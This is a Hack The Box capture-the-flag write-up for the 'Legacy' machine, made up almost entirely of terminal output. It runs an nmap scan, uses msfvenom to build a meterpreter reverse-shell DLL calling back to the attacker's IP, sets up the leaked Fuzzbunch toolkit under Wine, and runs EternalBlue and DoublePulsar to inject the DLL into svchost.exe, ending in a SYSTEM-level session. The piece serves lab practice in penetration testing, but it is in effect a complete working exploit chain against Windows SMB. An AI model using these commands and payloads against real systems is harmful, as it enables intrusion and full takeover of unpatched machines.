Legacy (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-07 21:04 EDT
Nmap scan report for 10.10.10.4
Host is up (0.13s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h22m31s, deviation: 2h07m16s, median: 4d22h52m31s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:8f:b6:69 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2019-04-13T05:57:25+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 134.72 ms 10.10.14.1
2 134.82 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 272.36 seconds

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.93
LHOST => 10.10.14.93
msf5 exploit(multi/handler) > set LPORT 6000
LPORT => 6000
msf5 exploit(multi/handler) > exploit

In another terminal:

root@kali:~/Downloads# mkdir 10.10.10.4
root@kali:~/Downloads# cd 10.10.10.4
root@kali:~/Downloads/10.10.10.4# WINEPREFIX="$HOME/.wine-fuzzbunch" WINEARCH=win32 wine wineboot
wine: created the configuration directory ‘/root/.wine-fuzzbunch’
0012:err:ole:marshal_object couldn’t get IPSFactory buffer for interface {00000131-0000-0000-c000-000000000046}
0012:err:ole:marshal_object couldn’t get IPSFactory buffer for interface {6d5140c1-7436-11ce-8034-00aa006009fa}
0012:err:ole:StdMarshalImpl_MarshalInterface Failed to create ifstub, hres=0x80004002
0012:err:ole:CoMarshalInterface Failed to marshal the interface {6d5140c1-7436-11ce-8034-00aa006009fa}, 80004002
0012:err:ole:get_local_server_stream Failed: 80004002
0014:err:ole:marshal_object couldn’t get IPSFactory buffer for interface {00000131-0000-0000-c000-000000000046}
0014:err:ole:marshal_object couldn’t get IPSFactory buffer for interface {6d5140c1-7436-11ce-8034-00aa006009fa}
0014:err:ole:StdMarshalImpl_MarshalInterface Failed to create ifstub, hres=0x80004002
0014:err:ole:CoMarshalInterface Failed to marshal the interface {6d5140c1-7436-11ce-8034-00aa006009fa}, 80004002
0014:err:ole:get_local_server_stream Failed: 80004002
Could not load wine-gecko. HTML rendering will be disabled.
wine: configuration in ‘/root/.wine-fuzzbunch’ has been updated.
root@kali:~/Downloads/10.10.10.4# WINEPREFIX="$HOME/.wine-fuzzbunch" winetricks python26
bash: winetricks: command not found
root@kali:~/Downloads/10.10.10.4# apt-get install winetricks
Reading package lists… Done
Building dependency tree
Reading state information… Done
The following additional packages will be installed:
fuseiso
The following NEW packages will be installed:
fuseiso winetricks
0 upgraded, 2 newly installed, 0 to remove and 281 not upgraded.
Need to get 303 kB of archives.
After this operation, 1,050 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://ftp.yzu.edu.tw/Linux/kali kali-rolling/main amd64 fuseiso amd64 20070708-3.2+b1 [20.4 kB]
Get:2 http://ftp.yzu.edu.tw/Linux/kali kali-rolling/contrib amd64 winetricks all 0.0+20181203-3 [283 kB]
Fetched 303 kB in 6s (50.2 kB/s)
Selecting previously unselected package fuseiso.
(Reading database … 422571 files and directories currently installed.)
Preparing to unpack …/fuseiso_20070708-3.2+b1_amd64.deb …
Unpacking fuseiso (20070708-3.2+b1) …
Selecting previously unselected package winetricks.
Preparing to unpack …/winetricks_0.0+20181203-3_all.deb …
Unpacking winetricks (0.0+20181203-3) …
Setting up fuseiso (20070708-3.2+b1) …
Setting up winetricks (0.0+20181203-3) …
Processing triggers for mime-support (3.62) …
Processing triggers for hicolor-icon-theme (0.17-2) …
Processing triggers for gnome-menus (3.31.4-3) …
Processing triggers for man-db (2.8.5-2) …

Processing triggers for desktop-file-utils (0.23-4) …
root@kali:~/Downloads/10.10.10.4# WINEPREFIX="$HOME/.wine-fuzzbunch" winetricks python26
------------------------------------------------------
Running Wine/winetricks as root is highly discouraged. See https://wiki.winehq.org/FAQ#Should_I_run_Wine_as_root.3F
------------------------------------------------------
Using winetricks 20181203 – sha256sum: b4b29a961905bfed1db98f10e2f09a356b719861fc8602ffbf813a22579b2848 with wine-4.0 (Debian 4.0-1) and WINEARCH=win32
Executing w_do_call python26
Executing load_python26
Executing mkdir -p /root/.cache/winetricks/python26
Executing cd /root/.cache/winetricks/python26
Downloading https://www.python.org/ftp/python/2.6.2/python-2.6.2.msi to /root/.cache/winetricks/python26
–2019-04-07 21:18:03– https://www.python.org/ftp/python/2.6.2/python-2.6.2.msi
Resolving www.python.org (www.python.org)… 151.101.36.223, 2a04:4e42:25::223
Connecting to www.python.org (www.python.org)|151.101.36.223|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 14536192 (14M) [application/octet-stream]
Saving to: ‘python-2.6.2.msi’

python-2.6.2.msi 100%[=======================================================================>] 13.86M 1.25MB/s in 16s

2019-04-07 21:18:20 (915 KB/s) – ‘python-2.6.2.msi’ saved [14536192/14536192]

Executing cd /root/Downloads/10.10.10.4
Executing cd /root/.cache/winetricks/python26
Downloading https://downloads.sourceforge.net/project/pywin32/pywin32/Build%20214/pywin32-214.win32-py2.6.exe to /root/.cache/winetricks/python26
–2019-04-07 21:18:20– https://downloads.sourceforge.net/project/pywin32/pywin32/Build%20214/pywin32-214.win32-py2.6.exe
Resolving downloads.sourceforge.net (downloads.sourceforge.net)… 216.105.38.13
Connecting to downloads.sourceforge.net (downloads.sourceforge.net)|216.105.38.13|:443… connected.
HTTP request sent, awaiting response… 302 Found
Location: https://excellmedia.dl.sourceforge.net/project/pywin32/pywin32/Build%20214/pywin32-214.win32-py2.6.exe [following]
–2019-04-07 21:18:21– https://excellmedia.dl.sourceforge.net/project/pywin32/pywin32/Build%20214/pywin32-214.win32-py2.6.exe
Resolving excellmedia.dl.sourceforge.net (excellmedia.dl.sourceforge.net)… 202.153.32.19
Connecting to excellmedia.dl.sourceforge.net (excellmedia.dl.sourceforge.net)|202.153.32.19|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 6438204 (6.1M) [application/octet-stream]
Saving to: ‘pywin32-214.win32-py2.6.exe’

pywin32-214.win32-py2.6.exe 100%[=======================================================================>] 6.14M 1.79MB/s in 3.6s

2019-04-07 21:18:25 (1.70 MB/s) – ‘pywin32-214.win32-py2.6.exe’ saved [6438204/6438204]

Executing cd /root/Downloads/10.10.10.4
Executing cd /root/.cache/winetricks/python26
Executing wine msiexec /i python-2.6.2.msi ALLUSERS=1
0009:err:mscoree:LoadLibraryShim error reading registry key for installroot
0009:err:mscoree:LoadLibraryShim error reading registry key for installroot
0009:err:mscoree:LoadLibraryShim error reading registry key for installroot
0009:err:mscoree:LoadLibraryShim error reading registry key for installroot
Executing mkdir -p /root/.cache/winetricks/ahk
Executing cd /root/.cache/winetricks/ahk
Downloading https://www.autohotkey.com/download/AutoHotkey104805.zip to /root/.cache/winetricks/ahk
–2019-04-07 21:18:37– https://www.autohotkey.com/download/AutoHotkey104805.zip
Resolving www.autohotkey.com (www.autohotkey.com)… 104.25.120.16, 104.25.121.16, 2606:4700:20::6819:7810, …
Connecting to www.autohotkey.com (www.autohotkey.com)|104.25.120.16|:443… connected.
HTTP request sent, awaiting response… 301 Moved Permanently
Location: https://www.autohotkey.com/download/1.0/AutoHotkey104805.zip [following]
–2019-04-07 21:18:38– https://www.autohotkey.com/download/1.0/AutoHotkey104805.zip
Reusing existing connection to www.autohotkey.com:443.
HTTP request sent, awaiting response… 200 OK
Length: 2047047 (2.0M) [application/octet-stream]
Saving to: ‘AutoHotkey104805.zip’

AutoHotkey104805.zip 100%[=======================================================================>] 1.95M 1.13MB/s in 1.7s

2019-04-07 21:18:41 (1.13 MB/s) – ‘AutoHotkey104805.zip’ saved [2047047/2047047]

Executing cd /root/.cache/winetricks/python26
Executing wine y:\ahk\AutoHotkey.exe C:\windows\Temp\_python26\tmp.ahk
002b:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
root@kali:~/Downloads/10.10.10.4# cd $HOME/.wine-fuzzbunch/drive_c && git clone https://github.com/mdiazcl/fuzzbunch-debian
Cloning into ‘fuzzbunch-debian’…
remote: Enumerating objects: 8888, done.
remote: Total 8888 (delta 0), reused 0 (delta 0), pack-reused 8888
Receiving objects: 100% (8888/8888), 153.09 MiB | 1.27 MiB/s, done.
Resolving deltas: 100% (3401/3401), done.
Checking out files: 100% (8402/8402), done.
root@kali:~/.wine-fuzzbunch/drive_c# sudo nano /usr/local/bin/fuzzbunch
root@kali:~/.wine-fuzzbunch/drive_c# sudo chmod +x /usr/local/bin/fuzzbunch
root@kali:~/.wine-fuzzbunch/drive_c# cd $HOME/.wine-fuzzbunch/drive_c/
root@kali:~/.wine-fuzzbunch/drive_c# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.93 LPORT=6000 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of dll file: 5120 bytes
Saved as: shell.dll
root@kali:~/.wine-fuzzbunch/drive_c# fuzzbunch
0009:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.

–[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\fuzzbunch-debian\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\fuzzbunch-debian\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

0) prompt confirm
1) execute

Exploit Autorun List
====================

0) apply
1) touch all
2) prompt confirm
3) execute

Special Autorun List
====================

0) apply
1) touch all
2) prompt confirm
3) execute

Payload Autorun List
====================

0) apply
1) prompt confirm
2) execute

[+] Set FbStorage => C:\fuzzbunch-debian\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 10.10.10.4
[?] Default Callback IP Address [] : 10.10.14.93
[?] Use Redirection [yes] : no

[?] Base Log directory [C:\fuzzbunch-debian\logs] :
[*] Checking C:\fuzzbunch-debian\logs for projects
Index Project
----- -------
0 Create a New Project

[?] Project [0] : 0
[?] New Project Name : LEGACY
[?] Set target log directory to ‘C:\fuzzbunch-debian\logs\legacy\z10.10.10.4’? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 10.10.10.4
[+] Set CallbackIp => 10.10.14.93

[!] Redirection OFF
[+] Set LogDir => C:\fuzzbunch-debian\logs\legacy\z10.10.10.4
[+] Set Project => legacy

fb > use EternalBlue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4

[*] Applying Session Parameters
[*] Running Exploit Touches

[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name Value
---- -----
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] TargetIp :: Target IP Address

[?] TargetIp [10.10.10.4] :

[*] TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.

[?] VerifyTarget [True] :

[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*] Target :: Operating System, Service Pack, and Architecture of target OS

0) XP Windows XP 32-Bit All Service Packs
*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 0
[+] Set Target => XP

[!] Preparing to Execute Eternalblue

[*] Mode :: Delivery mechanism

*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [10.10.10.4] :
[?] Destination Port [445] :
[+] (TCP) Local 10.10.10.4:445

[+] Configure Plugin Remote Tunnels

Module: Eternalblue
===================

Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target XP

[?] Execute Plugin? [Yes] : y
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor…
[+] Backdoor not installed, game on.
[*] Forcing MaxExploitAttempts to 1.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (12 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 00 Windows 5.1.
[*] Fingerprinting SMB non-paged pool quota
[+] Allocation total: 0xfff4
[+] Spray size: 0
[+] Allocation total: 0x1ffe8
[+] Spray size: 1
[+] Allocation total: 0x2ffdc
[+] Spray size: 2
[+] Allocation total: 0x3ffd0
[+] Spray size: 3
[+] Allocation total: 0x4ffc4
[+] Spray size: 4
[+] Allocation total: 0x5ffb8
[+] Spray size: 5
[+] Allocation total: 0x6ffac
[+] Spray size: 6
[+] Allocation total: 0x7ffa0
[+] Spray size: 7
[+] Allocation total: 0x8ff94
[+] Spray size: 8
[+] Allocation total: 0x9ff88
[+] Spray size: 9
[+] Allocation total: 0xaff7c
[+] Spray size: 10
[+] Allocation total: 0xbff70
[+] Spray size: 11
[+] Quota NOT exceeded after 12 packets
[+] Allocation total: 0xbff70
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
…………….DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending 2 non-paged pool fragment packets
….DONE.
[+] Sent 2 non-paged pool fragment packets ofsize 0x00006FF9
[+] Sending 10 non-paged pool grooming packets
……….DONE.
[+] Sent 10 non-paged pool grooming packets – groom complete
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor…
[+] Backdoor returned code: 10 – Success!
[+] Ping returned Target architecture: x86 (32-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

fb Special (Eternalblue) > use DoublePulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name Value
---- -----
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] TargetIp :: Target IP Address

[?] TargetIp [10.10.10.4] :

[*] TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*] Protocol :: Protocol for the backdoor to speak

*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*] Architecture :: Architecture of the target OS

*0) x86 x86 32-bits
1) x64 x64 64-bits

[?] Architecture [0] :

[*] Function :: Operation for backdoor to perform

*0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove’s backdoor from system

[?] Function [0] : 2
[+] Set Function => RunDLL

[*] DllPayload :: DLL to inject into user mode

[?] DllPayload [] :

[*] DllPayload :: DLL to inject into user mode

[?] DllPayload [] : C:\shell.dll
[+] Set DllPayload => C:\shell.dll

[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call

[?] DllOrdinal [1] :

[*] ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] : svchost.exe
[+] Set ProcessName => svchost.exe

[*] ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [10.10.10.4] :
[?] Destination Port [445] :
[+] (TCP) Local 10.10.10.4:445

[+] Configure Plugin Remote Tunnels

Module: Doublepulsar
====================

Name Value
---- -----
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
DllPayload C:\shell.dll
DllOrdinal 1
ProcessName svchost.exe
ProcessCommandLine
Protocol SMB
Architecture x86
Function RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target…
[+] Connected to target, pinging backdoor…
[+] Backdoor returned code: 10 – Success!
[+] Ping returned Target architecture: x86 (32-bit) – XOR Key: 0x008A2287
SMB Connection string is: Windows 5.1
Target OS is: XP x86
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 – Success!
[+] Backdoor returned code: 10 – Success!
[+] Backdoor returned code: 10 – Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded

fb Payload (Doublepulsar) >

Back to the listener:

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.93:6000
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.93:6000 -> 10.10.10.4:1033) at 2019-04-07 21:30:14 -0400

meterpreter > geuid
[-] Unknown command: geuid.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

@SAKSHAM DIXIT